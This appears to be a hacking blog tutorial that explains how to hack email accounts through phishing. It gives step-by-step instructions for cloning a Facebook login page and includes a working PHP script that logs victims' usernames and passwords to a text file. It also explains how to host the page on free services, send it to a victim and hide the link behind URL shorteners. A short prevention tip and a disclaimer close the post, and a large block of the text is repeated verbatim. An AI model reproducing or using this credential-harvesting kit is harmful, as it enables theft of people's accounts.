All About Phishing Scam And Hacking
we are discussing the easiest way of hacking an Email account i'e Phishing scam . Definition of phishing, what is a phishing scam, how it works and how to hack an email account using phishing scam more efficiently.
Phishing scam is one of the easiest and the oldest way of hacking an
email account. All beginner hackers should know about this.so lets go for it
Read this post carefully and leave your Feedback and queries in comments .and please follow our blog, and also follow us on g+.
Firtly Lets See What is Phishing?
In simple language phishing scam is creating fake pages to steal user credentials like username,password,phone no,etc.
1) First you need a Phisher. Phisher is a set of files used to fool someone .It consist of:-
i) Web page which appears to be same as that of victims account site.
i) A php script which posts the data (credentials)into a text file
iii) Text file in which credentials are saved.
2) Creating a Phisher?
2.1) Creating exact copy of the login page of site: Open that site in your bowser ,rightclick any where in free space and then click on view source.
2.2) Copy the entire source to notepad.
2.3)Editing source code :
Press“Ctrl+a” then “ctrl+f” (select all+find ) , then a dialogue box will appear , type “action”(without quotes) and press enter.
The word action will be highlighted in the notepad.You will then be having a line saying:
**action=”http://www.facebook.com/login.php?login_attempt=1″**
2.4)Change this with **action=”post.php”**(double quotes are necessary),and save
it as index.html.
2.5)Creating a Phishing script :
<?php
header ('Location: http://www.myhost.com/errorpage.html');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
copy the code to notepad and change**’Location:http://www.myhost.com/errorpage.html’**
with the url of the site you want to open after victim presses “Login” button like if you want your victim to be redirected to yahoo.com change **‘Location:http://www.yahoo.com/’**
and save it as “post.php”.
2.6) Create a log file: It is a file which contains all usernames and passwords . Open
notepad and save it as **usernames.txt**.
3) Now you need a free web hosting account .you can easily find some free hosts on google or try these:-
zymic.com
t35.com
my3 gb.com
Create account on any of these sites for free hosting plan.
4)After creating account just upload the three files to your web hosting account.
5)You are ready for the attack.Just send the link of your index.html to the victim.
If he opens and tries to login , id and password will be saved in the usernames.txt file.
6) Additional step:
You can hide URL by encrypting it using online URL encrypters like
is.gd
goo.gl
tinyurl.com
Go to any one of the above mentioned sites, enter your URL and
then it will encrypt the URL , copy the encrypted URL and then send it to Your Friends.
Logic:
Index.html : It is the exact copy of the Login page of a site.While editing it , we change “action=post.php” so when ever victim clicks on the Login button , Post.php will be executed.
Post.php: It is our phishing script, it takes the data and writes it to a text file , and then loads another page specified by the “location” tag in Php file.
usernames.txt : text file containing Passwords and Email id.
Prevention :
>Always check the Url before signing in . This is the most useful and effective way one can use to prevent himself from phishing .
>Other way is to use some good Antivirus software which warns you whenever you visit a harmful site.
Even if somehow you entered your credentials in a phisher, Immediately Change your password .
NOTE:-This tutorial is for educational purpose only,Use at your own risk. How to Hack discourages email account hacking using phishing scams for illegal purposes.
comp_how.ltd is not responsible for any type of loss caused due to this information!!
Keep Visiting How to Hack
copy the code to notepad and change**’Location:http://www.myhost.com/errorpage.html’**
with the url of the site you want to open after victim presses “Login” button like if you want your victim to be redirected to yahoo.com change **‘Location:http://www.yahoo.com/’**
and save it as “post.php”.
2.6) Create a log file: It is a file which contains all usernames and passwords . Open
notepad and save it as **usernames.txt**.
3) Now you need a free web hosting account .you can easily find some free hosts on google or try these:-
zymic.com
t35.com
my3 gb.com
Create account on any of these sites for free hosting plan.
4)After creating account just upload the three files to your web hosting account.
5)You are ready for the attack.Just send the link of your index.html to the victim.
If he opens and tries to login , id and password will be saved in the usernames.txt file.
6) Additional step:
You can hide URL by encrypting it using online URL encrypters like
is.gd
goo.gl
tinyurl.com
Go to any one of the above mentioned sites, enter your URL and
then it will encrypt the URL , copy the encrypted URL and then send it to Your Friends.
Logic:
Index.html : It is the exact copy of the Login page of a site.While editing it , we change “action=post.php” so when ever victim clicks on the Login button , Post.php will be executed.
Post.php: It is our phishing script, it takes the data and writes it to a text file , and then loads another page specified by the “location” tag in Php file.
usernames.txt : text file containing Passwords and Email id.
Prevention :
>Always check the Url before signing in . This is the most useful and effective way one can use to prevent himself from phishing .
>Other way is to use some good Antivirus software which warns you whenever you visit a harmful site.
Even if somehow you entered your credentials in a phisher, Immediately Change your password .
NOTE:-This tutorial is for educational purpose only,Use at your own risk. How to Hack discourages email account hacking using phishing scams for illegal purposes.
comp_how.ltd is not responsible for any type of loss caused due to this information!!
Keep Visiting How to Hack
http://comphow.blogspot.in/



